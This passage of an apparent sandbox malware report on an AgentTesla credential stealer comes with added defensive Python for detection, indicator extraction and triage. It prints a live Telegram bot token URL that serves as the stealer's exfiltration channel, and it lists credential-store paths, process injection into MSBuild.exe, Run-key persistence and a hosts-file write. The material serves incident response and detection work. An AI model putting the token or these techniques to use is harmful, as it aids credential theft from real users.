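DOTNET_INJECTION_HOSTS = {"msbuild.exe", "regsvcs.exe", "regasm.exe", "installutil.exe"}


def _norm(path):
    """Case-insensitive, backslash-normalised comparison form."""
    return path.replace("/", "\\").lower()


def classify(event):
    """Return the tuple of rule names a single event trips (empty if none)."""
    image = ntpath.basename(_norm(event["Image"]))
    target = _norm(event["Target"])
    hits = []
    if event["EventType"] == "RegKeyOpen":
        if target in CREDENTIAL_STORE_KEYS and image not in STORE_OWNERS:
            hits.append("credential_store_access")
    elif event["EventType"] in ("FileOpen", "FileWrite"):
        # Suffix match so the per-user profile prefix does not matter.
        if any(target.endswith(s) for s in CREDENTIAL_STORE_FILES) and image not in STORE_OWNERS:
            hits.append("credential_store_access")
        # Any write to the hosts file is worth a look; the report shows a build
        # tool doing it, which no allow-list should cover.
        if event["EventType"] == "FileWrite" and target == HOSTS_FILE:
            hits.append("hosts_file_write")
    return tuple(hits)


def analyze(events):
    """Aggregate rule hits per (image, pid). Severity is raised to high when
    the process is a known .NET injection host or trips more than one rule."""
    per_proc = defaultdict(set)
    for ev in events:
        for rule in classify(ev):
            per_proc[(ntpath.basename(_norm(ev["Image"])), ev["ProcessId"])].add(rule)
    findings = {}
    for (image, pid), rules in per_proc.items():
        severity = "high" if image in DOTNET_INJECTION_HOSTS or len(rules) > 1 else "medium"
        findings[(image, pid)] = {"rules": sorted(rules), "severity": severity}
    return findings


# Constructed sample events modelled on the report's observations (not real telemetry).
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    {"Image": MSBUILD, "ProcessId": 6856, "EventType": "FileOpen",
     "Target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"Image": MSBUILD, "ProcessId": 6856, "EventType": "RegKeyOpen",
     "Target": r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"},
    {"Image": MSBUILD, "ProcessId": 6856, "EventType": "FileOpen",
     "Target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Image": MSBUILD, "ProcessId": 6856, "EventType": "FileWrite",
     "Target": r"C:\Windows\System32\drivers\etc\hosts"},
    # Benign controls: the browser reading its own store, and MSBuild doing build work.
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "ProcessId": 4120,
     "EventType": "FileOpen",
     "Target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Image": MSBUILD, "ProcessId": 7000, "EventType": "FileOpen",
     "Target": r"C:\src\app\app.csproj"},
]

if __name__ == "__main__":
    for (image, pid), f in analyze(SAMPLE_EVENTS).items():
        print(f"{image} pid={pid} severity={f['severity']} rules={f['rules']}")
```

The point of the allow-list check is context, not the artifact alone: Chrome opening Login Data is normal, MSBuild.exe opening it is not, and the same process also rewriting the hosts file is the combination that puts PID 6856 at high severity while the build-only MSBuild instance produces no finding.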

                    Remote Access Functionality

Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
Source: Yara match | File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
MITRE ATT&CK Matrix

The matrix is reconstructed from the flattened grid. For each tactic, the techniques that carried a signature-count badge in the original cell are listed first, with the badge digits shown as extracted (e.g. [2 1 1]); the remaining grid cells, which carried no badge, follow in parentheses.

Initial Access: no technique flagged (grid: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise)

Execution: Windows Management Instrumentation [2 1 1]; Native API [1]; Scheduled Task/Job [1] (grid: At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript)

Persistence: Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [1] (grid: Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows))

Privilege Escalation: Process Injection [2 1 2]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [1] (grid: Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows))

Defense Evasion: File and Directory Permissions Modification [1]; Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [2 3]; Timestomp [1]; Masquerading [1]; Virtualization/Sandbox Evasion [1 3 1]; Process Injection [2 1 2]; Hidden Files and Directories [1]

Credential Access: OS Credential Dumping [1]; Input Capture [2 1 1] (grid: Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing)

Discovery: System Information Discovery [1 1 4]; Query Registry [1]; Security Software Discovery [2 1 1]; Process Discovery [2]; Virtualization/Sandbox Evasion [1 3 1]; Application Window Discovery [1]; Remote System Discovery [1] (grid: Network Service Scanning, System Network Connections Discovery, Process Discovery)

Lateral Movement: no technique flagged (grid: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content)

Collection: Archive Collected Data [1 1]; Data from Local System [1]; Email Collection [1]; Input Capture [2 1 1]; Clipboard Data [1] (grid: GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging)

Exfiltration: no technique flagged (grid: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol)

Command and Control: Web Service [1]; Encrypted Channel [1 1]; Non-Application Layer Protocol [2]; Application Layer Protocol [3] (grid: Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols)

Network Effects: no technique flagged (grid: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station)

Remote Service Effects: no technique flagged (grid: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups)

Impact: no technique flagged (grid: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction)
Behavior Graph (ID: 620228; sample: SecuriteInfo.com.Trojan.MSI...; start date: 04/05/2022; architecture: WINDOWS; score: 100)

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 10 other signatures.

Process tree:
- SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe (started)
  - dropped file: SecuriteInfo.com.T...Q.MTB.14730.exe.log (ASCII)
  - signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
  - started: MSBuild.exe
    - network: api.telegram.org, 149.154.167.220, destination port 443, source port 49768, TELEGRAMRU, United Kingdom
    - dropped files: C:\Users\user\AppData\Roaming\...\ykVBUY.exe (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII)
    - signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 5 other signatures
- ykVBUY.exe (started)
  - started: conhost.exe
- ykVBUY.exe (started)
  - started: conhost.exe

Antivirus detection, submitted file (Source | Detection | Scanner | Label):
SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | 0% | Virustotal |
C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | 0% | Metadefender |
C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | 0% | ReversingLabs |

A 0% result here means no engine on that service flagged the file at analysis time, not that the file is clean; the dropped copy is the persistence artifact of a sample that the unpacked-PE scans below flag at 100%.

Antivirus detection, unpacked PE files (Source | Detection | Scanner | Label):
9.0.MSBuild.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
9.0.MSBuild.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
9.0.MSBuild.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
9.0.MSBuild.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
9.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
9.0.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

Antivirus detection, domains: No Antivirus matches
Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://api.telegram.org4 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://UhwhaG.com | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
api.telegram.org | 149.154.167.220 | true | false | | high

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument | false | | high
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)

Memory-dump sources are abbreviated:
[A] SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp
[B] MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
[C] MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp
[D] MSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmp
[E] SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp; SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp; SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp; MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp; MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp

http://127.0.0.1:HTTP/1.1 | [B] | false | Avira URL Cloud: safe | low
http://www.apache.org/licenses/LICENSE-2.0 | [A] | false | | high
http://www.fontbureau.com | [A] | false | | high
http://www.fontbureau.com/designersG | [A] | false | | high
https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/ | [E] | false | | high
http://www.fontbureau.com/designers/? | [A] | false | | high
http://www.founder.com.cn/cn/bThe | [A] | false | URL Reputation: safe | unknown
https://api.telegram.org | [C] | false | | high
http://www.fontbureau.com/designers? | [A] | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | [B] | false | URL Reputation: safe | unknown
http://www.tiro.com | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | [A] | false | | high
http://www.goodfont.co.kr | [A] | false | URL Reputation: safe | unknown
https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument----- | [B] | false | | high
http://www.carterandcone.coml | [A] | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | [A] | false | URL Reputation: safe | unknown
http://www.typography.netD | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | [A] | false | | high
http://www.founder.com.cn/cn/cThe | [A] | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | [A] | false | URL Reputation: safe | unknown
http://fontfabrik.com | [A] | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | [A] | false | URL Reputation: safe | unknown
https://api.telegram.org4 | [C] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | [A] | false | | high
http://www.jiyu-kobo.co.jp/ | [A] | false | URL Reputation: safe | unknown
http://UhwhaG.com | [B] | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | [B] | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | [A] | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | [A] | false | | high
http://www.fonts.com | [A] | false | | high
http://www.sandoll.co.kr | [A] | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | [A] | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | [A] | false | URL Reputation: safe | unknown
http://api.telegram.org | [D] | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | [C] | false | | high
http://www.sakkal.com | [A] | false | URL Reputation: safe | unknown

Reading this table: the font-foundry URLs in [A] (fontbureau, tiro, sajatypeworks, founder, sandoll and the rest) are copyright strings carried in font metadata, not contact points. The network indicators that matter are the Telegram Bot API URLs in [B], [C], [D] and [E]: the bot token and the sendDocument method identify the exfiltration channel. The "safe" and "high" reputations attached to api.telegram.org describe the legitimacy of the domain, not of this bot, so they should not be read as clearing the traffic.
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
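The Telegram Bot API URL recovered above carries the bot token in its path, which is the one indicator from this report that is both unique to the operator and directly actionable (it can be reported to Telegram and hunted for in proxy logs). The following added example, which is not part of the Joe Sandbox report, shows how to pull such indicators out of a strings or memory dump and mask the secret for sharing. The input text is a constructed excerpt; the bot token and URLs in it are the ones this report recovered from the sample's memory.

```python
"""Extract Telegram Bot API indicators from a strings/memory dump.

Added example, not part of the Joe Sandbox report. The bot token below is the
one the report recovered from the sample; the surrounding text is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# A Telegram bot token is "<numeric bot id>:<35-character secret>", the secret
# drawn from the URL-safe base64 alphabet. The API method follows the token in
# the path, e.g. .../bot<id>:<secret>/sendDocument.
TOKEN_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{35})"
    r"(?:/(?P<method>[A-Za-z]+))?"
)


@dataclass(frozen=True)
class TelegramIndicator:
    bot_id: str
    secret: str
    method: Optional[str]   # None when the URL is only the token base path

    @property
    def token(self) -> str:
        return f"{self.bot_id}:{self.secret}"


def find_telegram_indicators(text: str) -> List[TelegramIndicator]:
    """Return unique (bot_id, secret, method) hits in first-seen order."""
    seen = set()
    out: List[TelegramIndicator] = []
    for m in TOKEN_RE.finditer(text):
        ind = TelegramIndicator(m["bot_id"], m["secret"], m["method"])
        if ind not in seen:
            seen.add(ind)
            out.append(ind)
    return out


def redact(token: str) -> str:
    """Mask the secret part of a token for reports; the bot id is safe to share."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


# Constructed strings-dump excerpt. The Telegram lines are the URLs the report
# lists under "URLs from memory and binaries"; the other lines are noise.
SAMPLE_STRINGS = """
https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/
https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument
http://127.0.0.1:HTTP/1.1
http://www.fontbureau.com/designers
"""

if __name__ == "__main__":
    for ind in find_telegram_indicators(SAMPLE_STRINGS):
        print(f"bot {ind.bot_id} method={ind.method} token={redact(ind.token)}")
```

The method name is kept because it tells you what to look for on the wire: a POST to /bot<id>:<secret>/sendDocument over TLS is the stolen-credential upload, and the only observable without TLS inspection is the SNI/DNS name api.telegram.org, which is why the reputation columns above say nothing about this bot.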
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:620228
Start date and time: 04/05/2022 14:36:07 (2022-05-04 14:36:07 +02:00)
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 30s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HDC Information:
                                                      • Successful, ratio: 1.1% (good quality ratio 1%)
                                                      • Quality average: 39.8%
                                                      • Quality standard deviation: 21%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 20.40.136.238, 23.211.6.115, 40.126.32.133, 20.190.160.14, 20.190.160.20, 40.126.32.140, 40.126.32.76, 40.126.32.72, 20.190.160.17, 40.126.32.74, 23.35.236.56, 20.82.210.154, 20.40.129.122, 80.67.82.211, 80.67.82.235, 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                      • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, store-images.s-microsoft.com, iris-de-prod-azsc-frc.francecentral.cloudapp.azure.com, displaycatalog-rp.md
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 2976 because it is empty
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 5256 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Timeline (Time | Type | Description):
14:37:39 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe modified
14:37:52 | API Interceptor | 615x Sleep call for process: MSBuild.exe modified
14:37:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
14:38:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
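The two Autostart rows and the hosts-file write recorded for MSBuild.exe are the host-side artifacts an incident responder would sweep other machines for. The following added example is not part of the Joe Sandbox report; it parses Autostart rows in the report's own format, flags Run-key values whose image lives in a user-writable location, and classifies non-default hosts-file entries. The timeline rows reproduce the two entries above with tab separators; the hosts-file content is constructed, because the report records the write but not what was written.

```python
"""Triage Run-key autostarts and hosts-file entries of the kind seen in this
analysis. Added example, not part of the Joe Sandbox report. The timeline rows
are the report's two Autostart entries re-typed with tab separators; the hosts
file content is constructed.
"""
import re
from typing import Dict, List, Tuple

# Report-style row: "<HH:MM:SS>\tAutostart\tRun: <key> <value name> <image path>"
AUTOSTART_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2})\tAutostart\tRun: (?P<key>HK\S+) (?P<name>\S+) (?P<path>.+)$"
)

# Locations a standard user can write to. A Run value pointing here is the
# usual footprint of a self-copied stealer rather than an installed product.
USER_WRITABLE_MARKERS = (
    "\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\",
    "\\users\\public\\", "\\downloads\\",
)

# Names that legitimately appear in a default hosts file.
LOCAL_NAMES = {
    "localhost", "localhost.localdomain", "broadcasthost",
    "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters",
}
SINK_ADDRS = {"0.0.0.0", "::1"}


def parse_autostart_events(timeline: str) -> List[Dict[str, str]]:
    """Return each Autostart row as a dict with time, key, name and path."""
    events = []
    for line in timeline.splitlines():
        m = AUTOSTART_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def is_user_writable_autostart(path: str) -> bool:
    """True when the autostart image sits where an unprivileged user can write."""
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def classify_hosts_entries(hosts_text: str) -> List[Tuple[str, str, str]]:
    """Return (hostname, address, kind) for every non-default hosts entry.

    kind is "blocked" when the name is pinned to a loopback or sink address
    (the pattern used to cut off security-vendor update traffic) and
    "redirected" when it points anywhere else.
    """
    findings = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            if name.lower() in LOCAL_NAMES:
                continue
            sink = addr in SINK_ADDRS or addr.startswith("127.")
            findings.append((name, addr, "blocked" if sink else "redirected"))
    return findings


def triage(timeline: str, hosts_text: str) -> Dict[str, list]:
    """Combine both checks into one finding set."""
    suspicious = [e for e in parse_autostart_events(timeline)
                  if is_user_writable_autostart(e["path"])]
    return {"autostarts": suspicious, "hosts": classify_hosts_entries(hosts_text)}


# The report's two Autostart rows, re-typed with tab separators.
SAMPLE_TIMELINE = (
    "14:37:58\tAutostart\tRun: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ykVBUY "
    "C:\\Users\\user\\AppData\\Roaming\\ykVBUY\\ykVBUY.exe\n"
    "14:38:06\tAutostart\tRun: HKCU64\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ykVBUY "
    "C:\\Users\\user\\AppData\\Roaming\\ykVBUY\\ykVBUY.exe\n"
)

# Constructed hosts file: default comment lines plus two appended entries.
SAMPLE_HOSTS = """# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
127.0.0.1 updates.vendor.example
0.0.0.0   telemetry.vendor.example
"""

if __name__ == "__main__":
    for section, findings in triage(SAMPLE_TIMELINE, SAMPLE_HOSTS).items():
        print(section, findings)
```

Both the HKCU and the HKCU64 rows resolve to the same value, so a sweep of other hosts should query the 32-bit and 64-bit registry views and dedupe on value name and path rather than counting hits.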
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1308
                                                      Entropy (8bit):5.345811588615766
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                                      MD5:EA78C102145ED608EF0E407B978AF339
                                                      SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
                                                      SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                                      SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                                      Malicious:true
                                                      Reputation:moderate, very likely benign file
